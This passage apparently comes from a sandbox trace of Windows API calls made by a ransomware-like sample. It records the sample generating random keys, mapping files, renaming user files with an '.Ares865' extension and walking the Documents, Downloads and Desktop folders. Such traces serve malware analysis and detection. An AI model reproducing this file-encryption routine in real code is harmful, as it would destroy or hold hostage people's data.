Size=0x6c) returned 0x2d2ef0 [0106.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.953] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.954] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x124 [0106.956] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0106.958] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.Ares865") returned 75 [0106.960] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.ares865"), dwFlags=0x1) returned 1 [0106.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.961] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0106.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.961] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.962] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.962] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.962] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x124 [0106.966] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0106.967] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.968] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0106.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.Ares865") returned 59 [0106.969] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0106.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0106.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.970] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.971] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.971] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.971] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x124 [0106.972] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0106.972] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.973] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.973] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.974] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0106.975] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UrVEZB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UrVEZB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UrVEZB" [0106.975] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0106.976] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Njys", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Njys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Njys" [0106.976] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL" [0106.976] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR" [0106.977] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy" [0106.977] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q" [0106.977] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0106.978] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw" [0106.979] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3" [0106.979] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5" [0106.980] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud" [0106.980] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK" [0106.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX" [0106.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m" [0106.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz" [0106.982] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6" [0106.982] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0106.983] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0106.983] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0106.984] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL" [0106.984] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb" [0106.984] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15" [0106.985] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-" [0106.985] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z" [0106.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW" [0106.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl" [0106.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp" [0106.987] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk" [0106.987] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\doxPgk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\doxPgk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\lHkSyhM2yL\\doxPgk" [0106.988] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0106.988] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR" [0106.989] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0" [0106.989] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl" [0106.989] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd" [0106.990] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD" [0106.990] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM" [0106.991] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5" [0106.991] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\EaPJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\EaPJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\EaPJ" [0106.991] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq" [0106.992] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO" [0106.992] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HC2DWD8y9GCS-C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HC2DWD8y9GCS-C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HC2DWD8y9GCS-C" [0106.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AAhmMGDil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AAhmMGDil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AAhmMGDil" [0106.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6vEJXxv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6vEJXxv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6vEJXxv" [0106.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-enPM9tXv_cz9F", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-enPM9tXv_cz9F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-enPM9tXv_cz9F" [0106.994] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0106.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Wl8bPblcznhyYXJw.bmp.Ares865") returned 